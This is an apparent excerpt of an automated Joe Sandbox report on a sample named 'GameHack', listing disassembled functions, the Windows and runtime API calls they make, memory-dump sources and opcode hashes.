                                      Function 00EF329A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON
                                      Download Yara Rule
                                      APIs
                                      • try_get_function.LIBVCRUNTIME ref: 00EF32AF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: try_get_function
                                      • String ID: FlsAlloc
                                      • API String ID: 2742660187-671089009
                                      • Opcode ID: 8df54c64459f000dfc7164a33a70973dadead71e5b68d746dce27dbae422ab8e
                                      • Instruction ID: 7f4c494f44466f758e4a63ffaf9dc2ad062a52a3d6f24a6022ca349a6e437286
                                      • Opcode Fuzzy Hash: 8df54c64459f000dfc7164a33a70973dadead71e5b68d746dce27dbae422ab8e
                                      • Instruction Fuzzy Hash: C9D05B3178167D6AD51032D56C03ABFBE848701FF5F450252FF087E2D295E2C95075D6
                                      Function 00EFB350 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00EFAF1B: GetOEMCP.KERNEL32(00000000,?,?,00EFB1A5,?), ref: 00EFAF46
                                      • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00EFB1EA,?,00000000), ref: 00EFB3C4
                                      • GetCPInfo.KERNEL32(00000000,00EFB1EA,?,?,?,00EFB1EA,?,00000000), ref: 00EFB3D7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: CodeInfoPageValid
                                      • String ID:
                                      • API String ID: 546120528-0
                                      • Opcode ID: b75c3a44b5900963904e767e8431b270a8796f319828353ffcc0caa3360fa3a6
                                      • Instruction ID: a71d991502e4a0f1e5439ee81c449d6a025a0ea5f649ce6856bd9c509e35ac0e
                                      • Opcode Fuzzy Hash: b75c3a44b5900963904e767e8431b270a8796f319828353ffcc0caa3360fa3a6
                                      • Instruction Fuzzy Hash: 2F517BB0A0020D9FDB24DF71C8806BBBBE5EF40314F18A46ED2A6AB253E735D541DB90
                                      Function 00EE2C42 Relevance: 3.1, APIs: 2, Instructions: 112COMMON
                                      Download Yara Rule
                                      APIs
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00EE2DA4
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00EE2DBC
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: Exception@8Throw
                                      • String ID:
                                      • API String ID: 2005118841-0
                                      • Opcode ID: 16828048afeec69fe0a4bb6700e94e385f666c5385bc004e4cf2f64575b41bc7
                                      • Instruction ID: d4f7e89be428eb931b5001a167f0171eca914f55fcdfd0d4b5fe4ef461ac65ef
                                      • Opcode Fuzzy Hash: 16828048afeec69fe0a4bb6700e94e385f666c5385bc004e4cf2f64575b41bc7
                                      • Instruction Fuzzy Hash: D94147B0A087C9ABD72CEE75D884799F7D8BF90308F14152EE75963142C774A888C796
                                      Function 00ED1385 Relevance: 3.1, APIs: 2, Instructions: 97COMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00ED1385
                                        • Part of subcall function 00ED6057: __EH_prolog.LIBCMT ref: 00ED605C
                                        • Part of subcall function 00EDC827: __EH_prolog.LIBCMT ref: 00EDC82C
                                        • Part of subcall function 00EDC827: new.LIBCMT ref: 00EDC86F
                                        • Part of subcall function 00EDC827: new.LIBCMT ref: 00EDC893
                                      • new.LIBCMT ref: 00ED13FE
                                        • Part of subcall function 00EDB07D: __EH_prolog.LIBCMT ref: 00EDB082
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: 2f4ebdba6d7b20879b0f7f880dd1944817dc9e0efaf1e5b8285b5bebb37ba50e
                                      • Instruction ID: 5d789a77b12d788d52a1534f72e2d2f1189341b92a960225e24d41e890c0f341
                                      • Opcode Fuzzy Hash: 2f4ebdba6d7b20879b0f7f880dd1944817dc9e0efaf1e5b8285b5bebb37ba50e
                                      • Instruction Fuzzy Hash: DB4122B0805B44DEE724DF7988859E6FAE6FF18300F505A6ED2EE93282DB326554CB11
                                      Function 00ED1380 Relevance: 3.1, APIs: 2, Instructions: 95COMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00ED1385
                                        • Part of subcall function 00ED6057: __EH_prolog.LIBCMT ref: 00ED605C
                                        • Part of subcall function 00EDC827: __EH_prolog.LIBCMT ref: 00EDC82C
                                        • Part of subcall function 00EDC827: new.LIBCMT ref: 00EDC86F
                                        • Part of subcall function 00EDC827: new.LIBCMT ref: 00EDC893
                                      • new.LIBCMT ref: 00ED13FE
                                        • Part of subcall function 00EDB07D: __EH_prolog.LIBCMT ref: 00EDB082
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: H_prolog
                                      • String ID:
                                      • API String ID: 3519838083-0
                                      • Opcode ID: beec9ad047d3b0ed23da8ba0e9decc7f1b13dc08cd457a7fcd704317beedb219
                                      • Instruction ID: b6f666cd9c82a98c1dda279f18fb0c0d6e0658b8c6e6e3ae933ddf4ee344cb9e
                                      • Opcode Fuzzy Hash: beec9ad047d3b0ed23da8ba0e9decc7f1b13dc08cd457a7fcd704317beedb219
                                      • Instruction Fuzzy Hash: 424112B0805B44DEE724DF7988859E7FAE5FF18300F505A6ED2EE93282DB326554CB11
                                      Function 00EFB188 Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00EF8FA5: GetLastError.KERNEL32(?,00F10EE8,00EF3E14,00F10EE8,?,?,00EF3713,00000050,?,00F10EE8,00000200), ref: 00EF8FA9
                                        • Part of subcall function 00EF8FA5: _free.LIBCMT ref: 00EF8FDC
                                        • Part of subcall function 00EF8FA5: SetLastError.KERNEL32(00000000,?,00F10EE8,00000200), ref: 00EF901D
                                        • Part of subcall function 00EF8FA5: _abort.LIBCMT ref: 00EF9023
                                        • Part of subcall function 00EFB2AE: _abort.LIBCMT ref: 00EFB2E0
                                        • Part of subcall function 00EFB2AE: _free.LIBCMT ref: 00EFB314
                                        • Part of subcall function 00EFAF1B: GetOEMCP.KERNEL32(00000000,?,?,00EFB1A5,?), ref: 00EFAF46
                                      • _free.LIBCMT ref: 00EFB200
                                      • _free.LIBCMT ref: 00EFB236
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: _free$ErrorLast_abort
                                      • String ID:
                                      • API String ID: 2991157371-0
                                      • Opcode ID: c901fa493080ed2fec60958a07e731972c8444c139dc7acac672b0143c7d30fe
                                      • Instruction ID: b0c1fda43042ed640e5978f689b63734d4e80cae615b66d1ff46a832d7f7033a
                                      • Opcode Fuzzy Hash: c901fa493080ed2fec60958a07e731972c8444c139dc7acac672b0143c7d30fe
                                      • Instruction Fuzzy Hash: D331F63190420CAFDB10EFA9C941BBDB7E5EF41324F255099E614BB2A1DB715D41CB40
                                      Function 00ED971E Relevance: 3.1, APIs: 2, Instructions: 86fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00ED9EDC,?,?,00ED7867), ref: 00ED97A6
                                      • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00ED9EDC,?,?,00ED7867), ref: 00ED97DB
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      • Opcode ID: c8f3362fd0d47b7843090375add476489f54d3e3c2e681e1f933dc47f9999521
                                      • Instruction ID: 9a8532e81ad2d46c35735780115fc8c47f2f8695c479a3a7699b35ddc36ce38a
                                      • Opcode Fuzzy Hash: c8f3362fd0d47b7843090375add476489f54d3e3c2e681e1f933dc47f9999521
                                      • Instruction Fuzzy Hash: 9D21F6B1510749AFD7308F24CC85BA7B7ECEB49768F00492FF5E5A2292C374AC469B61
                                      Function 00ED9D62 Relevance: 3.1, APIs: 2, Instructions: 82timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00ED7547,?,?,?,?), ref: 00ED9D7C
                                      • SetFileTime.KERNELBASE(?,?,?,?), ref: 00ED9E2C
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: File$BuffersFlushTime
                                      • String ID:
                                      • API String ID: 1392018926-0
                                      • Opcode ID: e673213b11ac6eb7cd59fd2d24a3941828c748f52026f349bf5f1b69392b10d4
                                      • Instruction ID: 094616a8d485a052b1326ecc12c93fdd6d3d89fc4a55c6bfbbb8b333f3297cf1
                                      • Opcode Fuzzy Hash: e673213b11ac6eb7cd59fd2d24a3941828c748f52026f349bf5f1b69392b10d4
                                      • Instruction Fuzzy Hash: 9521D63115828AABC714DE25C851AABBBE5EF9570CF04181EF4D1A7242D329DA0DDB61
                                      Function 00EFA458 Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetProcAddress.KERNEL32(00000000,00F03958), ref: 00EFA4B8
                                      • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00EFA4C5
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AddressProc__crt_fast_encode_pointer
                                      • String ID:
                                      • API String ID: 2279764990-0
                                      • Opcode ID: 810436f47af80095b674d5fe3de45fc800d71f0b82c02c0c58f960d3422c095e
                                      • Instruction ID: 78cd18f12aea65f88f51f6a0e53430a6367ef99c8ae768867967faf24cfa9142
                                      • Opcode Fuzzy Hash: 810436f47af80095b674d5fe3de45fc800d71f0b82c02c0c58f960d3422c095e
                                      • Instruction Fuzzy Hash: 4A112373A1112C8B9B269E28EC448BA7395AB8032471A4230EE29BF244EA70DC01D6D2
                                      Function 00ED9B59 Relevance: 3.1, APIs: 2, Instructions: 57COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetFilePointer.KERNELBASE(?,?,?,?,-00001964,?,00000800,-00001964,00ED9B35,?,?,00000000,?,?,00ED8D9C,?), ref: 00ED9BC0
                                      • GetLastError.KERNEL32 ref: 00ED9BCD
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: ErrorFileLastPointer
                                      • String ID:
                                      • API String ID: 2976181284-0
                                      • Opcode ID: 980fe444980f05e7f8ef95894eb5dfb144857302386b33737fdeca1cc423636a
                                      • Instruction ID: 2e0bee52005aad07cc333cee93342d5670f8b229ee133ed2b2ef40c98ae7edd4
                                      • Opcode Fuzzy Hash: 980fe444980f05e7f8ef95894eb5dfb144857302386b33737fdeca1cc423636a
                                      • Instruction Fuzzy Hash: 87010C313042159B8B08CE65AC849BEB399EFC0721B11662FF813A7382C671DC069B24
                                      Function 00ED9E40 Relevance: 3.1, APIs: 2, Instructions: 54COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 00ED9E76
                                      • GetLastError.KERNEL32 ref: 00ED9E82
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: ErrorFileLastPointer
                                      • String ID:
                                      • API String ID: 2976181284-0
                                      • Opcode ID: 48a6094e467d16e081e23490efd2fceca9cd6116fe61c895026beadc8f358ee3
                                      • Instruction ID: db301a08d39775b4fbbb6d58a49e2ff8237ece755c3ceb31755fea1254fcccff
                                      • Opcode Fuzzy Hash: 48a6094e467d16e081e23490efd2fceca9cd6116fe61c895026beadc8f358ee3
                                      • Instruction Fuzzy Hash: A001B1713052046BEB34DF29DC44B6BB7D9EB88318F144A3FB546D3781DA71EC8A8610
                                      Function 00EF8606 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 00EF8627
                                        • Part of subcall function 00EF8518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00EFC13D,00000000,?,00EF67E2,?,00000008,?,00EF89AD,?,?,?), ref: 00EF854A
                                      • HeapReAlloc.KERNEL32(00000000,?,?,?,?,00F10F50,00EDCE57,?,?,?,?,?,?), ref: 00EF8663
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: Heap$AllocAllocate_free
                                      • String ID:
                                      • API String ID: 2447670028-0
                                      • Opcode ID: 0304333daf2a8df518c3fc082bed9de7bcd75f4138b1513c7a503226604b4ada
                                      • Instruction ID: 39d8a00b4bf6b6a00da9e3139ffc970fe3f37e281fe9987cffee8d0850cf3b37
                                      • Opcode Fuzzy Hash: 0304333daf2a8df518c3fc082bed9de7bcd75f4138b1513c7a503226604b4ada
                                      • Instruction Fuzzy Hash: 50F0F63220111D66DB212A21AE01F7F379D9FE1BB4F26B116FB58FA291DF30C80095A4
                                      Function 00EE0908 Relevance: 3.0, APIs: 2, Instructions: 33COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentProcess.KERNEL32(?,?), ref: 00EE0915
                                      • GetProcessAffinityMask.KERNEL32(00000000), ref: 00EE091C
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: Process$AffinityCurrentMask
                                      • String ID:
                                      • API String ID: 1231390398-0
                                      • Opcode ID: 56aa47681f699747c57cbcfa3242a70c31a9f7dbde423d315108fd281bd3590a
                                      • Instruction ID: 483c11838e70b1b389347d35da42cde0821c71265d95777a0b937c6fe87632c2
                                      • Opcode Fuzzy Hash: 56aa47681f699747c57cbcfa3242a70c31a9f7dbde423d315108fd281bd3590a
                                      • Instruction Fuzzy Hash: 9CE09B32A1114DABBF05CEA59C044FB739DEBC43187105179A807E3202F675DD418660
                                      Function 00EDA444 Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00EDA27A,?,?,?,00EDA113,?,00000001,00000000,?,?), ref: 00EDA458
                                      • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00EDA27A,?,?,?,00EDA113,?,00000001,00000000,?,?), ref: 00EDA489
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AttributesFile
                                      • String ID:
                                      • API String ID: 3188754299-0
                                      • Opcode ID: 655f314a5a3fef07c8f008367547477e4b79901591495c1f06557c68dd5b5eff
                                      • Instruction ID: 7ebe0a7dd8dcbbaff0c28e2308d7aad43fb07bea37ba6fad62a1eb3f30958d62
                                      • Opcode Fuzzy Hash: 655f314a5a3fef07c8f008367547477e4b79901591495c1f06557c68dd5b5eff
                                      • Instruction Fuzzy Hash: D7F0A73124120DBBDF115F60DC05FDA375CFB04385F088065BC4896261DB71CAA5AA50
                                      Function 00EED573 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: ItemText_swprintf
                                      • String ID:
                                      • API String ID: 3011073432-0
                                      • Opcode ID: 53dee49320a1078c090962e607654f483e11167c402698c32123ab0657407618
                                      • Instruction ID: 682be06af4af3857ad4cff2e24d182372526c95983320243fc9bc6479deed988
                                      • Opcode Fuzzy Hash: 53dee49320a1078c090962e607654f483e11167c402698c32123ab0657407618
                                      • Instruction Fuzzy Hash: 8DF0EC7150438C7BEB11EB719C06FE9379DD704745F041556B600731A1DE716A615B62
                                      Function 00EDA12D Relevance: 3.0, APIs: 2, Instructions: 28fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • DeleteFileW.KERNELBASE(?,?,?,00ED984C,?,?,00ED9688,?,?,?,?,00F01FA1,000000FF), ref: 00EDA13E
                                      • DeleteFileW.KERNEL32(?,?,?,00000800,?,?,00ED984C,?,?,00ED9688,?,?,?,?,00F01FA1,000000FF), ref: 00EDA16C
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
